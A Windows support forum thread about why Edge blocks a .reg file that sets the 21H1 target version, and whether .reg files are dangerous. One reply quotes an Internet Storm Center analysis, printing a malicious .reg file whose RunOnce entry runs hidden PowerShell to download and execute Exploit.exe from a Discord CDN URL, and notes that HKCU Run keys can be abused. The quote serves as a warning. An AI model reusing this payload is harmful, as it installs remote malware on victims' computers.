News, tips, advice, support for Windows, Office, PCs & more
Home icon Home icon Home icon Email icon RSS icon

We're community supported and proud of it!

• Update to 21h1

Home Forums AskWoody support Windows Windows 10 Questions: Win10 Update to 21h1

Viewing 3 reply threads
    • Author

I’ve tried downloading the little registry key file recommended by Susan but my pc won’t download it saying that it has blocked the download because it could cause problems. How do I get around this? I’m currently running W10 pro 20h2

False alarm. I’ve been on holiday  the past fortnight, and I have followed up on an older post by Susan, showing how to  change it manually. When I now check, I find I have already altered the registry to 21h1. It hasn’t updated me yet, although my pc checked for updates over an hour ago.

It would still be nice to know why my pc won’t download Susan’s little file.

Alex5723
        AskWoody Plus

t would still be nice to know why my pc won’t download Susan’s little file.

Your PC doesn’t download the file. Your browser does and is correct. .reg files are dangerous and can harm your Windows OS..
        Which browser do you use ? Browsers have options to force/accept the download.

I’m using  Edge.

b
            AskWoody MVP

Hover over the “blocked” message, then click More actions [], Keep.

Windows 10 Pro version 21H2 build 19044.1263 + Microsoft 365 (group ASAP)

Ok, thanks for that. I’ll bear it in mind for the future. In the meantime, 21h1 has just installed itself, so I’m up to date as far as i want to be.

Rick Corbett
          AskWoody_MVP

Your browser does and is correct. .reg files are dangerous and can harm your Windows OS.

That’s a bit of a blanket statement IMHO and – correct me if I’m wrong – I have yet to see a post here (or anywhere else for that matter) saying that a .REG file caused harm.

Whilst there may be a miniscule risk that a .REG file could prevent a Windows device from booting, I suggest not blindly ‘merging’ any .REG file unless you know its purpose and – if you have any concerns – back the registry up first.

The registry is not something to be afraid of, despite the ‘Here Be Dragons’ spin that so many put on it. All this FUD does is make people hesitant about using it for their own benefit.

With the tiniest modicum of respect, the registry is an excellent tool for amending the behaviour of Windows, especially when Microsoft appear intent on obfuscating functionality in its quest for “one size fits all… ‘cos we say so”. (Hence why Microsoft’s Edge won’t allow the download of .REG files.)

Edge’s nanny-state stance about not downloading .REG files is like a supermarket that won’t let you purchase butter in case it hardens your arteries. It’s absolute nonsense. The OP just needs to install a better browser more suited to adults. 🙂

b
            AskWoody MVP

That’s a bit of a blanket statement IMHO and – correct me if I’m wrong – I have yet to see a post here (or anywhere else for that matter) saying that a .REG file caused harm.

A .REG file from an untrusted source can be used to install malware or ransomware:

Today, I spotted another file that is also interesting: A Windows Registry file (with a “.reg” extension). Such files are text files created by exporting values from the Registry (export) but they can also be used to add or change values in the Registry (import). Being text files, they don’t look suspicious.

Windows Registry Editor Version 5.00
            [HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\runonce]
            “ray”=”cmd.exe /c cd %USERPROFILE% & powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxps://cdn[.]discordapp[.]com/attachments/847773813131182112/868160361466040321/Exploit.exe’,’system.exe’);Start ‘system.exe’& exit”

You can see that the Registry file will add a new key in HKCU\Software\Microsoft\windows\CurrentVersion\runonce. This means that, at the next reboot, the computer will execute the key value: It will start a Powershell that will fetch the payload from the Discord CDN and executes it.

When you double-click on a .reg file, Windows warns you that “something weird may happen”:

But, with the help of social engineering, it could be possible to force the user to install the Registry key!

So, be careful with Registry files!

Infected With a .reg File — Published: 2021-07-30
            [Internet Storm Center]

A .REG file for a user key does not even require admin privileges:

The Problem
            Criminals and red teams have been known to use .hta, .vbs, .vbe, .js, .jse, .html, .bat, .cmd files to break into a computer/network. However, you don’t hear too much about [.reg] files, which will be interpreted by RegEdit to make changes to the registry. On a default installation of Windows, the user does not need special admin privileges to add keys to HKCU\Software\Microsoft\Windows\CurrentVersion\Run. So, if they receive an email and are tricked into running the [.reg] file, they could be adding an ‘evil’ key.

Malicious [.reg] Files

Edge’s nanny-state stance about not downloading .REG files is like a supermarket that won’t let you purchase butter in case it hardens your arteries. It’s absolute nonsense. The OP just needs to install a better browser more suited to adults.

Edge uses the same list of dangerous file types as Google Chrome and all Chromium browsers, with a similar warning for user confirmation:

File Type Danger Level
            Microsoft Edge inherits its file type policies from the upstream Chromium browser; you can view the current contents of the list here, and documentation of its format here.

Download Blocking by File Type
            [Microsoft Edge Program Manager Blog]

Firefox also uses Google Safe Browsing Service:

Download protection
            Before beginning a download, Firefox will attempt to protect you from potentially malicious or unsafe downloads.

Potentially malicious downloads are detected using Google Safe Browsing Service.

Where to find and manage downloaded files in Firefox

So the vast majority of browsers used have the same download protection for potentially dangerous file types by default. You may have disabled such warnings in your browser, but it’s a bad idea for most people.

Windows 10 Pro version 21H2 build 19044.1263 + Microsoft 365 (group ASAP)

SallyBrown
        AskWoody Plus

No trouble with it on half a dozen machines but I always use an ISO offline for version upgrades.  Also do updates offline, pulled from the catalog.

Make a restore point before any updates/upgrades.  Yeah, I know, “No problems here.”  Yet.

Viewing 3 reply threads

Please follow the -Lounge Rules- no personal attacks, no swearing, no politics or religion.

Reply To: Update to 21h1

You can use BBCodes to format your content.
    Your account can't use Advanced BBCodes, they will be stripped before saving.